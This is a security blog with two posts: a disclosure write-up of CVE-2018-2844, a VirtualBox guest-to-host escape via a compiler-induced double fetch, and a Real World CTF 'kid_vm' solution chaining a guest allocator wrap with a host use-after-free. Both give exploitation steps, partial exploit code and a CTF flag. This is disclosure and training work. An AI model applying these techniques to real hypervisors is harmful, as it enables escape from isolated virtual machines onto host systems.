Tuesday, August 28, 2018

From Compiler Optimization to Code Execution - VirtualBox VM Escape - CVE-2018-2844

Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works on top of VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory implemented using Video RAM buffer. The VRAM buffer is at physical address 0xE0000000
sudo lspci -vvv

00:02.0 VGA compatible controller: InnoTek Systemberatung GmbH VirtualBox Graphics Adapter (prog-if 00 [VGA controller])
 ...
 Interrupt: pin A routed to IRQ 10
 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=16M]
 Expansion ROM at  [disabled]
 Kernel modules: vboxvideo
The guest sets up command buffer using HGSMI as below and writes the offset in VRAM to IO port VGA_PORT_HGSMI_GUEST (0x3d0) to notify the host.
 HGSMIBUFFERHEADER header; 
 uint8_t data[header.u32BufferSize]; 
 HGSMIBUFFERTAIL tail;
The bug specifically occurs in code handling Video DMA (VDMA) commands passed from Guest to Host. The VDMA command handling function vboxVDMACmdExec() dispatches to specific functions based on VDMA command types. This is implemented as switch case statements.
static int
vboxVDMACmdExec(PVBOXVDMAHOST pVdma, const uint8_t *pvBuffer, uint32_t cbBuffer)
{
 /* pvBuffer is shared memory in VRAM */
        PVBOXVDMACMD pCmd = (PVBOXVDMACMD)pvBuffer;

        switch (pCmd->enmType) {
                case VBOXVDMACMD_TYPE_CHROMIUM_CMD: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_PRESENT_BLT: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_NOP: {
                        ...
                }
                case VBOXVDMACMD_TYPE_CHILD_STATUS_IRQ: {
                        ...
                }
                default: {
                         ...
                }
        }
}
The compiler optimizes the switch cases to jump tables. This is what it looks like after optimization:
; first fetch happens for cmp
.text:00000000000B957A                 cmp     dword ptr [r12], 0Ah ; switch 11 cases
.text:00000000000B957F                 ja      VBOXVDMACMD_TYPE_DEFAULT ; jumptable 00000000000B9597 default case

; second fetch again for pCmd->enmType from shared memory
.text:00000000000B9585                 mov     eax, [r12]
.text:00000000000B9589                 lea     rbx, vboxVDMACmdExec_JMPS
.text:00000000000B9590                 movsxd  rax, dword ptr [rbx+rax*4]
.text:00000000000B9594                 add     rax, rbx
.text:00000000000B9597                 jmp     rax             ; switch jump
.rodata:0000000000185538 vboxVDMACmdExec_JMPS dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                                         ; DATA XREF: vboxVDMACommand+1D9o
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_PRESENT_BLT - 185538h ; jump table for switch statement
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185564                 align 20h
The issue is quite clear, its a TOCTOU bug. Since the variable is not marked volatile, GCC optimizations resulted in double fetch from shared VRAM memory. I didn't see such optimization in VirtualBox for Windows and OSX. Only Linux hosts are affected.

Note that this kind of issue is not new. We have prior research Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm on similar issue found in Xen

Exploitation:

Though the race window is really small, it can be reliably won on guests having more than one vCPU.
 RAX  0xdeadbeef
 RBX  0x7fff8abf2538 ◂— rol    byte ptr [rdx - 0xd], 1
 RCX  0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RDX  0xe7b
 RDI  0xeeb
 RSI  0x7fffdc022000 ◂— xor    byte ptr [rax], al /* 0xffe40030; '0' */
 R8   0x7fff89d20000 ◂— jmp    0x7fff89d20010 /* 0xb020000000eeb */
 R9   0x7fff8ab06040 ◂— push   rbp
 R10  0x7fff9c50ad48 ◂— 0x1 
 R11  0x7fff9c508d48 ◂— 0x0
 R12  0x7fff89d20078 ◂— 0xa /* '\n' */ 
 R13  0xf3b
 R14  0x7fff9c50d0e0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 R15  0x7fff89d20030 ◂— 0xffffffdc0f3b0eeb
 RBP  0x7fffba44dc40 —▸ 0x7fffba44dca0 —▸ 0x7fffba44dce0 —▸ 0x7fffba44dd00 —▸ 0x7fffba44dd50 ◂— ...
 RSP  0x7fffba44db80 —▸ 0x7fffba44dbb0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RIP  0x7fff8ab26590 ◂— movsxd rax, dword ptr [rbx + rax*4]


 ► 0x7fff8ab26590    movsxd rax, dword ptr [rbx + rax*4]
   0x7fff8ab26594    add    rax, rbx
   0x7fff8ab26597    jmp    rax
RAX is controlled by guest. R8, R12 and R15 points to offsets within HGSMI buffer during the crash. The jump table uses relative addressing, hence once cannot directly call into a pointer. First plan was to find a feature, which allows to write a controlled value in VBoxDD.so from guest and further use it as fake jump table. However, I failed to find one.

Next option is to directly jump to the VRAM buffer mapped with RWX permissions using whatever value available for fake jump table.
    // VRAM buffer
    0x7fff88d21000     0x7fff89d21000 rwxp  1000000 0

    
    // VBoxDD.so
    0x7fff8aa6d000     0x7fff8adff000 r-xp   392000 0      /usr/lib/virtualbox/VBoxDD.so
    0x7fff8adff000     0x7fff8afff000 ---p   200000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8afff000     0x7fff8b010000 r--p    11000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8b010000     0x7fff8b018000 rw-p     8000 3a3000 /usr/lib/virtualbox/VBoxDD.so
Find a value in VBoxDD.so (assume as some fake jump table), which during relative address calculation will point into the 16MB shared VRAM buffer. For the proof-of-concept exploit fill the entire VRAM with NOP's and place the shellcode at the final pages of the mapping. No ASLR bypass is needed since the jump is relative.

In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf. vboxvideo.ko driver has a custom allocator to manage VRAM memory and HGSMI guest side implementations. Blacklisting vboxvideo reduces activity on VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server 16.04.3 64-bit as guest and Ubuntu Desktop 16.04.4 64-bit as host running VirtualBox 5.2.6.r120293.

The proof-of-concept exploit code with process continuation and connect back over network can be found at virtualbox-cve-2018-2844



References:

[1] Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm
[2] SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities by Niklas Baumstark
[3] VM escape - QEMU Case Study by Mehdi Talbi & Paul Fariello
[4] Xen Security Advisory CVE-2015-8550 / XSA-155
[5] Oracle Critical Patch Update Advisory - April 2018

Saturday, August 11, 2018

Real World CTF - kid_vm

kid_vm is a KVM API based challenge. The provided user space binary uses KVM ioctl calls to setup guest and execute guest code in 16-bit real mode. The binary comes with following mitigations
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
The guest code is copied to a page allocated using mmap. KVM_SET_USER_MEMORY_REGION call then sets up guest memory with guest physical starting at address 0 and backing memory pointing to the mmap’ed page
       
        guest_memory = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        if (!guest_memory) {
                perror("Mmap fail");
                return 1;
        }

        /* copy guest code */
        memcpy(guest_memory, guest, sizeof(guest));

        region.slot = 0;
        region.guest_phys_addr = 0;
        region.memory_size = 0x10000;
        region.userspace_addr = (uint64_t) guest_memory;

        if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region) == -1) {
The guest code also sets KVM_GUESTDBG_SINGLESTEP which causes VM exit (KVM_EXIT_DEBUG) on each step. KVM does doesn't seem to notify userspace code on VM exit caused by vmcall. Single stepping looks like a work around to detect vmcall instruction.
        memset(&debug, 0, sizeof(debug));
        debug.control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP;

        if (ioctl(vcpu, KVM_SET_GUEST_DEBUG, &debug) < 0) {
                perror("Fail");
                return 1;
        }
The next interesting part of code is the user space VM exit handler
    switch (run->exit_reason) {

        case KVM_EXIT_IO:
            if (run->io.direction == KVM_EXIT_IO_OUT && run->io.size == 1
                         && run->io.port == 23 && run->ex.error_code == 1) {

                putchar(*((char *)run + run->io.data_offset));
                continue;
            }

            if (run->io.direction == KVM_EXIT_IO_IN && run->io.size == 1
                            && run->io.port == 23 && run->ex.error_code == 1) {

                read(0, ((char *)run + run->io.data_offset), 1);
                continue;
            }

            fwrite("Unhandled IO\n", 1, 0xD, stderr);
            return 1;

        case KVM_EXIT_DEBUG:
            if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                puts("Error get regs!");

            /* check if VMCALL instruction */
            if (guest_memory[regs.rip] == 0xF && guest_memory[regs.rip + 1] == 1
                                        && guest_memory[regs.rip + 2] == 0xC1) {

                if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                    puts("Error get regs!");

                switch (regs.rax) {

                    case 0x101:
                        free_memory(regs.rbx, regs.rcx);
                        break;
                    case 0x102:
                        copy_memory(regs.rbx, regs.rcx, regs.rdx, guest_memory);
                        break;
                    case 0x100:
                        alloc_memory(regs.rbx);
                        break;
                    default:
                        puts("Function error!");
                        break;
                }
           }
           continue;
VM exits caused port I/O ( KVM_EXIT_IO) are handled to read and write data using stdin/stdout. Three interesting hypercalls are implemented on top of KVM_EXIT_DEBUG event.

Host Bugs:

A. The array that manages host allocations and size, can be accessed out of bound by all 3 hypercalls (free_memory, copy_memory, alloc_memory) Below is the code from alloc_memory
     /* index can take the value 16 here when going out of loop */
     for (index = 0; index <= 0xF && allocations[index]; ++index);

     mem = malloc(size);

     if (mem) {
         allocations[index] = mem;        // out of bounds access
         alloca_size[index] = size;       // can overwrite allocations[0]
         ++number_of_allocs;

This bug is less interesting for exploitation, since there is an use-after-free which gives better primitives

B. The hypercall for freeing memory has an option to free a pointer but not clear the reference. However the guest code enables to access only case 3.
        if (index <= 16) {               // out of bound access

                switch (choice) {

                        case 2:
                                free(allocations[index]);
                                allocations[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 3:
                                free(allocations[index]);
                                allocations[index] = 0;
                                alloca_size[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 1:
                                // double free/UAF as pointer is not set to NULL
                                free(allocations[index]);               
                                break;
                }
        } 
This UAF can be further exercised in the hypercall to copy memory between guest and host
    if (size <= alloca_size[index]) {
        if (choice == 1) {
            // write to freed memory due to UAF
            memcpy(allocations[index], guest_memory + 0x4000, size);        
        }
        else if (choice == 2) {
            // read from uninitialized or freed memory
            memcpy(guest_memory + 0x4000, allocations[index], size);        
        }
    } 
Guest Bug:

Though the host code has UAF, this bug cannot be triggered using the guest code thats currently under execution. Hence we need to achieve code execution in the guest before trying for a VM escape. The guest code starts at address 0. It initializes the stack pointer to 0x3000
seg000:0000                 mov     sp, 3000h
seg000:0003                 call    main
seg000:0006                 hlt
The guest code to allocate memory in guest looks like below:
seg000:007E                 mov     ax, offset size_value
seg000:0081                 mov     bx, 2           ; get 2 byte size
seg000:0084                 call    inb
seg000:0087                 mov     ax, ds:size_value
seg000:008A                 cmp     ax, 1000h       ; check if size < 0x1000
seg000:008D                 ja      short size_big
seg000:008F                 mov     cx, ds:total_bytes
seg000:0093                 cmp     cx, 0B000h
seg000:0097                 ja      short guest_mem_full
seg000:0099                 mov     si, word ptr ds:nalloc
seg000:009D                 cmp     si, 16          ; check the number of allocations made
seg000:00A0                 jnb     short too_many_allocs
seg000:00A2                 mov     di, cx
; move beyond stack@0x3000 and host shared_mem@0x4000, but this can wrap
seg000:00A4                 add     cx, 5000h       
seg000:00A8                 add     si, si
seg000:00AA                 mov     ds:address_array[si], cx ; save address
seg000:00AE                 mov     ds:size_array[si], ax ; save size
seg000:00B2                 add     di, ax
seg000:00B4                 mov     ds:total_bytes, di
seg000:00B8                 mov     al, ds:nalloc
seg000:00BB                 inc     al
seg000:00BD                 mov     ds:nalloc, al

The guest uses the following memory region:
text region  @ 0x0
stack bottom @ 0x3000
shared memory @ 0x4000
heap @ 0x5000 – 0x5000+0xB000
The guest memory allocator starts at address 0x5000 and checks for maximum memory limit allocated being 0xB000. However the check total_bytes + 0x5000 can wrap to 0 during 16-bit addition. This allocation at address 0, allows to overwrite guest code with arbitrary code. Now the vulnerable hypercall paths in host can be triggered from guest.

Exploitation:

I didn’t overwrite the entire guest code, but extended its functionality with the following changes to set bx with user supplied values during vmcall
seg000:0058 _free_memory:                           ; CODE XREF: main+2A↑j
seg000:0058                 call    get_choice
seg000:005B                 jmp     short loop
seg000:01A3                 call    set_choice
seg000:01A6                 mov     cl, ds:index    ; index
seg000:01AA                 mov     dx, ds:size_value
seg000:01AE                 vmcall
 
seg000:01DF                 mov     ax, 101h        ; free
seg000:01E2                 call    set_choice
seg000:01E5                 mov     cl, ds:index
seg000:01E9                 vmcall
seg000:0386 choice          dw 0                    ; DATA XREF: get_choice+B↓o
seg000:0386                                         ; set_choice↓r
seg000:0388
seg000:0388 get_choice      proc near               ; CODE XREF: main:_free_memory↑p
seg000:0388                 push    ax
seg000:0389                 push    bx
seg000:038A                 mov     ax, (offset aElcomeToTheVir+0B7h) ; 
seg000:038D                 mov     bx, 0Ch
seg000:0390                 call    outb
seg000:0393                 mov     ax, offset choice
seg000:0396                 mov     bx, 1
seg000:0399                 call    inb
seg000:039C                 pop     bx
seg000:039D                 pop     ax
seg000:039E                 retn
seg000:039E get_choice      endp
seg000:039E
seg000:039F set_choice      proc near               ; CODE XREF: update_host_memory+4C↑p
seg000:039F                                         ; free_host_memory+1F↑p
seg000:039F                 mov     bx, ds:choice
seg000:03A3                 retn
seg000:03A3 set_choice      endp
Leaking libc and heap pointers:

Since unsorted chunk freelist pointers can be read using UAF, this leaks arena and heap pointers. Allocate 4 chunks, free alternate chunks to prevent coalescing and read the pointers using UAF as below:
for x in range(4):
    allocate_host_memory(256)

free_host_memory(0, INVALID_FREE)
free_host_memory(2, VALID_FREE) 

copy_memory(256, 0, 'A'*256, COPY_FROM_HOST)
heap_mem = p.recvn(0x1000)
Getting code execution:

House of Orange works for this situation. Create a large chunk and free it, but hold reference to the pointer. Later use this reference to overwrite the top chunk to gain code execution. The flag in rwctf format was WoW_YoU_w1ll_B5_A_FFFutuRe_staR_In_vm_E5c4pe. The exploit for the challenge can be found here

References: Using the KVM API, House of Orange